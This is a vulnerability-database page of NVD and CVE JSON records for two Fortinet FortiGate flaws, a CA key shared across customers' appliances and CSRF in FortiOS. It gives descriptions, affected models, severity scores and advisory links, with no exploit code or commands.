The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cret@cert.org | http://osvdb.org/87048 | ||
| cret@cert.org | http://www.kb.cert.org/vuls/id/111708 | Third Party Advisory, US Government Resource | |
| cret@cert.org | http://www.securityfocus.com/bid/56382 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/87048 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/111708 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/56382 | Third Party Advisory, VDB Entry |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:fortinet:fortigate-1000c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E7EF5E98-4A7F-486E-A666-5CB2D6AE4B6F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-100d:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0D62FF7B-F07B-4B1A-BE3C-3269BB517B64",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-110c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9D25F582-60D5-4B99-BF5D-DF0F075AE824",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-1240b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C1D6711-1D64-4BD3-9580-C332A52C169E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-200b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09756E3C-7C02-4482-B2ED-2646CA127A7E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-20c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F864DACE-F574-47D3-9E6D-8E463DCC1CB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-300c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "18E0C2D6-A8B3-4CF0-86CD-45CEA5D9E4E5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3040b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "42813ADB-E285-4FF0-946C-3A09833D9520",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-310b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B75EAF6-3E8C-40CC-92D1-6069123182AC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-311b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0BB1DA95-78AD-442D-8251-3ACF49CA2329",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3140b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5014850E-FE19-40E8-8FA9-0FC152167B58",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3240c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "89280DF2-D8C0-4FDE-A79A-92687445CB20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3810a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6CB41136-3EBB-45B5-A885-69EE822E9C5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3950b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FB3B88B6-3B10-4CE8-A854-9621E0FB1B30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-40c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5534A2C1-C352-49BD-B639-404FE61660E0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5001a-sw:-:*:*:*:*:*:*:*",
"matchCriteriaId": "615D7EB5-CA3B-430D-A1CB-8F7F17BCF403",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5001b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "766FAC92-8E75-4347-9A76-DB372DA28715",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F9320594-0B6C-44DB-9C58-7FCBBDDC3F3F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5060:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9BD39F61-3779-44BE-B71D-0E587072D8CC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-50b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CE424B2A-3299-496F-9778-04D0792BC0D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5101c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "59C78680-88A9-4AB0-9FE9-333690A9B66A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5140b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7AA3538A-5B71-4939-8A2A-93678E6EB1D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-600c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A73FA2A-1852-4AE0-A892-9B0B06705324",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-60c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1F72F3FE-DC85-4605-B416-4FE31F90A06A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-620b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9D4BC042-D692-477E-A790-7BECF4B210A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-800c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6EB09BD9-6853-40D6-BDA7-749D87335E4F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-80c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "113E1146-572A-466A-AB34-145081F842B4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-voice-80c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BF418899-1667-4428-B8E8-E4E29D634DDC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigaterugged-100c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9C24DF92-D24B-43D1-8623-17F3F90F29D0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities."
},
{
"lang": "es",
"value": "La configuraci\u00f3n predeterminada de Fortinet FortiGate UTM utiliza el mismo certificado de la autoridad de certificaci\u00f3n (CA) y la misma clave privada en instalaciones de diferentes clientes, lo que hace que sea m\u00e1s f\u00e1cil para atacantes MITM (man-in-the-middle) a la hora de falsificar servidores SSL, aprovechando la presencia del certificado Fortinet_CA_SSLProxy en una lista de confianza de la autoridad de certificaci\u00f3n ra\u00edz.\r\n"
}
],
"id": "CVE-2012-4948",
"lastModified": "2024-11-21T01:43:48.363",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:H/Au:N/C:C/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.2,
"impactScore": 7.8,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-11-14T12:30:59.507",
"references": [
{
"source": "cret@cert.org",
"url": "http://osvdb.org/87048"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/56382"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/87048"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/56382"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-295"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
cve-2012-4948
Vulnerability from cvelistv5
Published
2012-11-14 11:00
Modified
2024-08-06 20:50
Severity ?
EPSS score ?
Summary
The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.kb.cert.org/vuls/id/111708 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.securityfocus.com/bid/56382 | vdb-entry, x_refsource_BID | |
| http://osvdb.org/87048 | vdb-entry, x_refsource_OSVDB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:50:18.189Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VU#111708",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"name": "56382",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/56382"
},
{
"name": "87048",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/87048"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-10-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-02-26T10:00:00",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"name": "VU#111708",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"name": "56382",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/56382"
},
{
"name": "87048",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/87048"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2012-4948",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "VU#111708",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"name": "56382",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/56382"
},
{
"name": "87048",
"refsource": "OSVDB",
"url": "http://osvdb.org/87048"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2012-4948",
"datePublished": "2012-11-14T11:00:00",
"dateReserved": "2012-09-17T00:00:00",
"dateUpdated": "2024-08-06T20:50:18.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-1414
Vulnerability from cvelistv5
Published
2013-07-08 17:00
Modified
2024-09-16 20:16
Severity ?
EPSS score ?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.exploit-db.com/exploits/26528/ | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T14:57:05.156Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "26528",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/26528/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-07-08T17:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "26528",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/26528/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-1414",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "26528",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/26528/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-1414",
"datePublished": "2013-07-08T17:00:00Z",
"dateReserved": "2013-01-24T00:00:00Z",
"dateUpdated": "2024-09-16T20:16:50.095Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}